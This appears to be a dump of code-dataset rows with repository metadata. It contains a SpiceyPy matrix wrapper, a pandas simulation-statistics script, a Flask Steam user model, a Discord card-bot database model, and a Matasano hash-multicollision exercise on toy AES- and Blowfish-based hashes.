return stypes.cVectorToPython(output_state)
@spiceErrorCheck
def xpose(m):
"""
Transpose a 3x3 matrix
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/xpose_c.html
:param m: Matrix to be transposed
:type m: 3x3-Element Array of floats
:return: Transposed matrix
:rtype: 3x3-Element Array of floats
"""
m = stypes.toDoubleMatrix(m)
mout = stypes.emptyDoubleMatrix(x=3, y=3)
libspice.xpose_c(m, mout)
return stypes.cMatrixToNumpy(mout)
@spiceErrorCheck
def xpose6(m):
"""
Transpose a 6x6 matrix
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/xpose6_c.html
:param m: Matrix to be transposed
:type m: list[6][6]
:return: Transposed matrix
:rtype: list[6][6]
"""
m = stypes.toDoubleMatrix(m)
mout = stypes.emptyDoubleMatrix(x=6, y=6)
libspice.xpose6_c(m, mout)
return stypes.cMatrixToNumpy(mout)
@spiceErrorCheck
def xposeg(matrix, nrow, ncol):
"""
Transpose a matrix of arbitrary size
in place, the matrix need not be square.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/xposeg_c.html
:param matrix: Matrix to be transposed
:type matrix: NxM-Element Array of floats
:param nrow: Number of rows of input matrix.
:type nrow: int
:param ncol: Number of columns of input matrix
:type ncol: int
:return: Transposed matrix
:rtype: NxM-Element Array of floats
"""
matrix = stypes.toDoubleMatrix(matrix)
mout = stypes.emptyDoubleMatrix(x=ncol, y=nrow)
ncol = ctypes.c_int(ncol)
nrow = ctypes.c_int(nrow)
libspice.xposeg_c(matrix, nrow, ncol, mout)
return stypes.cMatrixToNumpy(mout)
| mit | -6,712,519,455,095,810,000 | 31.357298 | 229 | 0.674344 | false | 3.19477 | false | false | false |
AlexisEidelman/Til | til/pgm/output/statistics.py | 2 | 2570 | '''
Created on 29 Apr 2013
@author: alexis_e
'''
from pandas import HDFStore, merge # DataFrame
import numpy as np
import pdb
import time
from utils import til_name_to_of
temps = time.clock()
simul = "C:/til/output/simul.h5"
# output = HDFStore(calc)
simul = HDFStore(simul)
nom = 'register'
base = 'entities/'+nom
register = simul[str(base)]
indiv = register['id'].unique()
reg_ind = register.groupby('id')
naiss = reg_ind.max()['naiss']
deces = reg_ind.max()['deces']
duree_vie = (deces>0) * (deces - naiss)
duree_vie_freq = duree_vie.value_counts()
print duree_vie_freq
pdb.set_trace()
table = {}
nom = 'person'
base = 'entities/'+nom
ent = til_name_to_of[nom]
table[ent] = simul[str(base)]
table[ent] = table[ent].rename(columns={'men': 'idmen', 'foy': 'idfoy', 'id': 'noi'})
# liste des donnees temporaire que l on peut supprimer
# anc, expr, education_level, nb_children_ind, dur_separated, dur_in_couple, agegroup_civilstate, agegroup_work
# quifoy, idfoy, quimen, idmen, wpr;_init
# get years
years = np.unique(table[ent]['period'].values)
# get individuals
ids = np.unique(table[ent]['noi'].values)
#typemap = {bool: int, int: int, float: float}
#res_type = typemap[dtype(expr, context)]
res_size = len(ids)
#
#sum_values = np.zeros((res_size,4), dtype=float)
#for ind in ids:
# x = table[ent][table[ent]['noi']==ind][['sali','rsti','choi']].sum().values
# sum_values[ind,1:] = x
# sum_values[ind,0] = ind
list2drop = ['wprm_init','age','idmen','idfoy','quifoy', 'pere','mere','conj','dur_in_couple','dur_out_couple',
'education_level','productivity','xpr','anc']
list2keep = ['sexe','noi','findet','civilstate','workstate','sali','rsti','choi']
#tab = table[ent].drop(list2drop, axis=1)
tab = table['ind'][list2keep]
indiv = tab.groupby(['noi'],sort=False)
cumul = indiv.sum()
nb_obs = indiv.size()
moyenne = cumul.div(nb_obs,axis=0)
# nombre d'annee dans chaque etat.
workstate = tab.groupby(['noi','workstate'],sort=False).size()
civilstate = tab.groupby(['noi','civilstate'],sort=False).size()
passage = table['ind'][['noi','period','idmen','idfoy','quifoy','quimen']]
## donnee menage
tabm = output['men']
tabm = merge(passage, tabm , how='right', on=['period','idmen'], sort=False)
tabm[['ndvdisp','ndvini','ndvnet']] = tabm[['revdisp','revini','revnet']].div(tabm['uc'],axis=0)
menag = tabm.groupby(['noi'],sort=False)
cumul = menag.sum()
nb_obs = menag.size()
moyenne = cumul.div(nb_obs,axis=0)
decile = tabm.groupby(['noi','decile'],sort=False).size()
pdb.set_trace()
simul.close()
output.close()
| gpl-3.0 | 8,974,987,625,415,200,000 | 27.241758 | 111 | 0.659533 | false | 2.562313 | false | false | false |
Arcana/emoticharms.trade | app/users/models.py | 1 | 3953 | from app import db, steam
from steam.api import HTTPError, HTTPTimeoutError
from flask.ext.login import AnonymousUserMixin
import datetime
from app.emoticharms.models import UserPack
class AnonymousUser(AnonymousUserMixin):
user_class = 0
@staticmethod
def update_steam():
return False
@staticmethod
def is_admin():
return False
@staticmethod
def is_uploader():
return False
class User(db.Model):
__tablename__ = "users"
account_id = db.Column(db.Integer, primary_key=True, autoincrement=False)
name = db.Column(db.String(256, collation="utf8_swedish_ci"), default=account_id)
profile_url = db.Column(db.String(128))
avatar_small = db.Column(db.String(128))
avatar_medium = db.Column(db.String(128))
avatar_large = db.Column(db.String(128))
joined = db.Column(db.DateTime, default=datetime.datetime.utcnow, nullable=False)
last_seen = db.Column(db.DateTime, default=datetime.datetime.utcnow, nullable=False)
next_steam_check = db.Column(db.DateTime, default=datetime.datetime.utcnow() + datetime.timedelta(hours=4))
user_class = db.Column(db.Integer, default=0)
signed_in = db.Column(db.Boolean, default=True)
ti5_ticket = db.Column(db.Boolean, default=False)
enabled = db.Column(db.Boolean, default=True)
email = db.Column(db.String(256, collation="utf8_swedish_ci"))
__mapper_args__ = {
"order_by": [db.asc(joined)]
}
def __init__(self, account_id=None, signed_in=None, last_seen=None):
self.account_id = account_id
self.signed_in = signed_in
self.last_seen = last_seen
self.fetch_steam_info()
def __repr__(self):
return self.name
def get_id(self):
return unicode(self.account_id)
def is_active(self):
return self.enabled
@staticmethod
def is_anonymous():
return False
@staticmethod
def is_authenticated():
return True
def is_admin(self):
return True if self.user_class > 1 else False
def update_last_seen(self):
now = datetime.datetime.utcnow()
if not self.next_steam_check:
self.next_steam_check = datetime.datetime.utcnow()
self.last_seen = now
if self.next_steam_check < now:
self.fetch_steam_info()
db.session.add(self)
db.session.commit()
def fetch_steam_info(self):
steam_info = steam.user.profile(self.steam_id)
self.update_steam_info(steam_info)
def update_steam_info(self, steam_info):
try:
self.name = steam_info.persona
self.profile_url = steam_info.profile_url
self.avatar_small = steam_info.avatar_small
self.avatar_medium = steam_info.avatar_medium
self.avatar_large = steam_info.avatar_large
self.ti5_ticket = self.check_ti5_ticket_status() if not self.ti5_ticket else self.ti5_ticket
self.next_steam_check = datetime.datetime.utcnow() + datetime.timedelta(hours=4)
except (HTTPError, HTTPTimeoutError):
self.next_steam_check = datetime.datetime.utcnow() + datetime.timedelta(minutes=30)
def check_ti5_ticket_status(self): # This API call is secured, so don't try it!
status = steam.api.interface("IDOTA2Ticket_570").SteamAccountValidForEvent(EventID=1, SteamID=self.steam_id)\
.get("result")
return status.get("valid")
@property
def steam_id(self):
return self.account_id + 76561197960265728
@property
def perma_profile_url(self):
return "http://steamcommunity.com/profiles/{}".format(self.steam_id)
@property
def spare_packs(self):
return UserPack.query.filter(UserPack.user_id == self.account_id, UserPack.quantity > 1).all()
@property
def wanted_packs(self):
return UserPack.query.filter(UserPack.user_id == self.account_id, UserPack.quantity == 0).all()
| gpl-2.0 | 4,285,753,455,298,286,000 | 33.077586 | 117 | 0.653428 | false | 3.485891 | false | false | false |
glouis/Laima-Discord-Bot | laima/model.py | 1 | 12691 | """
This file is part of Laima Discord Bot.
Copyright 2017 glouis
Laima Discord Bot is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Laima Discord Bot is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Laima Discord Bot. If not, see <http://www.gnu.org/licenses/>.
"""
import enum
import json
import os
from peewee import *
import re
import unidecode
laima_db = SqliteDatabase("laima.db")
languages = [("EN", 1), ("FR", 2), ("ES", 3)]
class PackColour(enum.Enum):
BRONZE = 3
SILVER = 2
GOLD = 1
NECRO = 4
OROPO = 5
class Trophy(enum.Enum):
FIRST = 1
SECOND = 2
THIRD = 3
TOP20 = 20
TOP100 = 100
VETERAN = 30
class CardType(enum.Enum):
CREATURE = 0
SPELL = 1
OBJECT = 2
class Extension(enum.Enum):
BASE = 1
OROPO = 281
NECRO = 518
class Family(enum.Enum):
NONE = 0
IOP = 1
CRA = 2
ENIRIPSA = 3
ENUTROF = 4
SRAM = 5
SACRIER = 6
FECA = 7
ECAFLIP = 8
XELOR = 9
OSAMODAS = 10
MULTIMAN = 11
ARACHNEE = 12
TOFU = 13
GOBBALL = 14
BOOWOLF = 15
LARVA = 16
TREECHNID = 17
WABBITS = 18
RAT = 19
DRHELLER = 20
VAMPIRE = 21
CRACKLER = 22
SCARALEAF = 23
PIWI = 24
BLIBLI = 25
STRICH = 26
MONK = 27
CHAFER = 28
CAWWOT = 29
JELLY = 30
WHISPERER = 31
SADIDA = 32
BROTHERHOOD_OF_THE_TOFU = 33
UNKNOW = 34
HUPPERMAGE = 35
BOW_MEOW = 36
RIKTUS = 37
KOKOKO = 38
MOOGRR = 39
SNAPPER = 40
SCHNEK = 41
CROBAK = 42
DOLL = 43
OUGINAK = 44
MASQUERAIDER = 45
ROGUE = 46
BANDIT = 47
BELLAPHONE = 48
MUSHD = 49
BWORK = 50
PIG = 51
CASTUC = 52
TOAD = 53
KWISMAS_CREATURE = 54
DRAGON = 55
ELIATROPE = 56
SCARECROW = 57
PUDDLY = 58
GRAMBO = 59
VIGILANTE = 60
KRALOVE = 61
MOSKITO = 62
PRINCESS = 63
PRESPIC = 64
PLANT = 65
POLTER = 66
FLEA = 67
SHARK = 68
ALBATROCIOUS = 69
SHUSHU = 70
FOGGERNAUT = 71
TAUR = 72
TROOL = 73
MIDGINS = 74
LOOT = 75
CHEST = 76
PALADIR = 77
NECRO = 78
TRAP = 79
SNOOFLE = 80
DRHELLZERKER = 81
GHOUL = 82
BROTHERHOOD_OF_THE_FORGOTTEN = 83
PANDAWA = 84
ELIOTROPE = 85
FAN = 86
class God(enum.Enum):
NEUTRAL = 0
IOP = 1
CRA = 2
ENIRIPSA = 3
ECAFLIP = 4
ENUTROF = 5
SRAM = 6
XELOR = 7
SACRIER = 8
FECA = 9
SADIDA = 10
RUSHU = 17
class Rarity(enum.Enum):
COMMON = 0
UNCOMMON = 1
RARE = 2
KROSMIC = 3
INFINITE = 4
class BaseModel(Model):
class Meta:
database = laima_db
class Draft(BaseModel):
victories_number = IntegerField(unique=True)
level = IntegerField()
pack = IntegerField()
kamas = CharField()
chips = CharField()
earnings = CharField()
class Meta:
order_by = ('victories_number',)
class Server(BaseModel):
id = CharField(unique=True)
lang = IntegerField(default=1)
prefix = CharField(default="&")
class Meta:
order_by = ('id',)
class Channel(BaseModel):
id = CharField(unique=True)
lang = IntegerField(default=None, null=True)
twitter = BooleanField(default=False)
rss = BooleanField(default=False)
server = ForeignKeyField(Server, related_name='channels')
class Meta:
order_by = ('id',)
class Rank(BaseModel):
number = CharField(unique=True)
common = IntegerField(default = 0)
uncommon = IntegerField(default = 0)
rare = IntegerField(default = 0)
krosmic = IntegerField(default = 0)
infinite = IntegerField(default = 0)
kamas = IntegerField()
pedestal = BooleanField(default = True)
trophy = IntegerField(default = None, null=True)
class Meta:
order_by = ('number',)
class CardData(BaseModel):
card_id = CharField(unique=True)
card_type = IntegerField()
ap_cost = IntegerField()
life = IntegerField()
attack = IntegerField()
movement_point = IntegerField()
extension = IntegerField()
families = CharField(default="0")
god = IntegerField(default=0)
rarity = IntegerField()
infinite_level = IntegerField(null=True, default=None)
is_token = BooleanField(default=False)
class Meta:
order_by = ('card_id',)
class CardText(BaseModel):
card_data = ForeignKeyField(CardData, related_name='texts')
name = CharField()
description = TextField()
lang = IntegerField()
class Meta:
order_by = ('name',)
class Tag(BaseModel):
name = CharField(unique=True)
class Meta:
order_by = ('name',)
class CardTextTag(BaseModel):
cardtext = ForeignKeyField(CardText, related_name='tags')
tag = ForeignKeyField(Tag, related_name='cardtexts')
class RssFeeder(BaseModel):
lang = IntegerField(unique=True)
last_entry_id = CharField(default=None)
class TwitterFeeder(BaseModel):
lang = IntegerField(unique=True)
last_tweet_id = CharField(default=None)
def create_tables():
laima_db.connect()
laima_db.create_tables([CardData, CardText, CardTextTag, Channel, Draft, Rank, RssFeeder, Server, Tag, TwitterFeeder])
laima_db.close()
def init_draft():
for i in range(13):
if i < 7:
pack = PackColour.BRONZE.value
if i == 0:
level = 1
kamas = "15-25"
chips = "0"
earnings = "15-25"
elif i < 4:
level = 2
kamas = "25-35"
if i == 1:
chips = "50"
earnings = "30-40"
if i == 2:
chips = "100-150"
earnings = "35-50"
if i == 3:
chips = "150-250"
earnings = "40-60"
else:
level = 3
kamas = "35-45"
if i == 4:
chips = "250-350"
earnings = "60-80"
if i == 5:
chips = "350-600"
earnings = "70-105"
if i == 6:
chips = "450-850"
earnings = "80-130"
else:
level = 4
if i < 10:
pack = PackColour.SILVER.value
kamas = "50-60"
if i == 7:
chips = "700-1100"
earnings = "120-170"
if i == 8:
chips = "950-1700"
earnings = "145-230"
if i == 9:
chips = "1200-2300"
earnings = "170-290"
else:
pack = PackColour.GOLD.value
kamas = "200"
if i == 10:
chips = "1800-2900"
earnings = "380-490"
if i == 11:
chips = "2400-2950"
earnings = "440-495"
if i == 12:
chips = "3000"
earnings = "500"
with laima_db.transaction():
Draft.create(victories_number=i,
level=level,
pack=pack,
kamas=kamas,
chips=chips,
earnings=earnings)
def init_rank():
for i in range(6, 31):
number = str(i)
if i < 18:
kamas = (i - 3) * 5
if i < 11:
with laima_db.transaction():
Rank.create(number=number,
common=2,
uncommon=1,
kamas=kamas)
elif i < 16:
with laima_db.transaction():
Rank.create(number=number,
common=2,
rare=1,
kamas=kamas)
else:
with laima_db.transaction():
Rank.create(number=number,
uncommon=2,
rare=1,
kamas=kamas)
elif i < 26:
kamas = (i - 10) * 10
if i < 21:
with laima_db.transaction():
Rank.create(number=number,
uncommon=2,
rare=1,
kamas=kamas)
else:
with laima_db.transaction():
Rank.create(number=number,
uncommon=2,
krosmic=1,
kamas=kamas)
else:
if i == 30:
with laima_db.transaction():
Rank.create(number=number,
uncommon=2,
infinite=1,
kamas=300,
trophy=Trophy.VETERAN.value)
else:
kamas = (i - 19) * 25
with laima_db.transaction():
Rank.create(number=number,
uncommon=2,
infinite=1,
kamas=kamas)
with laima_db.transaction():
Rank.create(number="Top 100",
uncommon=2,
infinite=1,
kamas=300,
trophy=Trophy.TOP100.value)
Rank.create(number="Top 20",
uncommon=2,
infinite=1,
kamas=300,
trophy=Trophy.TOP20.value)
Rank.create(number="3rd",
uncommon=2,
infinite=1,
kamas=300,
trophy=Trophy.THIRD.value)
Rank.create(number="2nd",
uncommon=2,
infinite=1,
kamas=300,
trophy=Trophy.SECOND.value)
Rank.create(number="1st",
uncommon=2,
infinite=1,
kamas=300,
trophy=Trophy.FIRST.value)
def init_card_and_tag(directory):
for filename in os.listdir(directory):
print(filename)
filepath = directory + "/" + filename
json_to_card_and_tag(filepath)
def json_to_card_and_tag(filepath):
inf_lvl_regex = re.compile(r"\d$")
bold_regex = re.compile(r"<.?b>")
with open(filepath, 'r') as file_data:
data = json.load(file_data)
name = {}
tags = {}
desc = {}
families = ','.join([str(fam) for fam in data["Families"]])
infinite_level = None
if data["Rarity"] == 4:
inf_lvl = inf_lvl_regex.search(data["Name"]).group(0)
infinite_level = int(inf_lvl)
for language, __ in languages:
name[language] = data["Texts"]["Name" + language]
tags[language] = unidecode.unidecode(name[language]).lower().split()
desc[language] = ' '.join(data["Texts"]["Desc" + language].split())
desc[language] = bold_regex.subn("**", desc[language])[0]
if data["Rarity"] == 4:
tags[language].append(inf_lvl)
with laima_db.transaction():
card_data = CardData.create(card_id=data["Name"],
card_type=data["CardType"],
ap_cost=data["CostAP"],
life=data["Life"],
attack=data["Attack"],
movement_point=data["MovementPoint"],
extension=data["Extension"],
families=families,
god=data["GodType"],
rarity=data["Rarity"],
infinite_level=infinite_level,
is_token=data["IsToken"])
for language, lang_id in languages:
card_text = CardText.create(card_data=card_data,
name=name[language],
description=desc[language],
lang = lang_id)
for tag in tags[language]:
tag_row = Tag.get_or_create(name=tag)[0]
card_tag = CardTextTag.create(cardtext=card_text, tag=tag_row)
def init_rss_feeder():
with laima_db.transaction():
for __, lang_id in languages:
RssFeeder.create(lang=lang_id)
def init_twitter_feeder():
with laima_db.transaction():
for __, lang_id in languages:
TwitterFeeder.create(lang=lang_id)
| gpl-3.0 | 9,206,986,548,832,388,000 | 26.351293 | 122 | 0.505713 | false | 3.621861 | false | false | false |
shainer/matasano | set7/ch52_part2.py | 1 | 1575 | #!/usr/bin/python3
from Crypto.Cipher import AES
from Crypto.Cipher import Blowfish
import math
import itertools
from ch52 import *
def F(message):
return MerkleDamgard(padPKCS7(message), state=b'\x07\x87', stateLen=2)
# This is a MD construction like in F, but with a larger state length,
# different initial state, and Blowfish instead of AES.
def G(message, state=b'\x00\x00', stateLen=3):
newState = state
newState = padPKCS7(newState)
for i in range(GetNumBlocks(message)):
cipher = Blowfish.new(newState, Blowfish.MODE_ECB)
newState = cipher.encrypt(GetBlock(message, i))
newState = padPKCS7(newState[:stateLen])
return newState[:stateLen]
def H(message):
return F(message) + G(message)
# Takes a list of collisions and returns those that are collisions in G
# too.
def FindGCollisions(collisions):
hashDict = {}
newCollisions = []
for c in collisions:
h = G(c)
if h not in hashDict:
hashDict[h] = [c]
else:
hashDict[h].append(c)
for k in hashDict:
if len(hashDict[k]) > 1:
newCollisions.extend(hashDict[k])
return newCollisions
if __name__ == '__main__':
stateLen = 2
# This finds a good number of collisions in G (and therefore H).
collisions = FindCollisions(stateLen, 8192, b'\x07\x87')
print('Found %d collisions for F' % len(collisions))
if not VerifyCollisions(collisions, b'\x07\x87'):
print('!! Error')
else:
hCollisions = FindGCollisions(collisions)
if len(hCollisions) > 0:
print('[**] Found collisions for both F and G:', hCollisions)
else:
print('[**] Collisions were only valid for F')
| gpl-3.0 | 6,155,153,189,169,903,000 | 24 | 71 | 0.707937 | false | 2.84296 | false | false | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.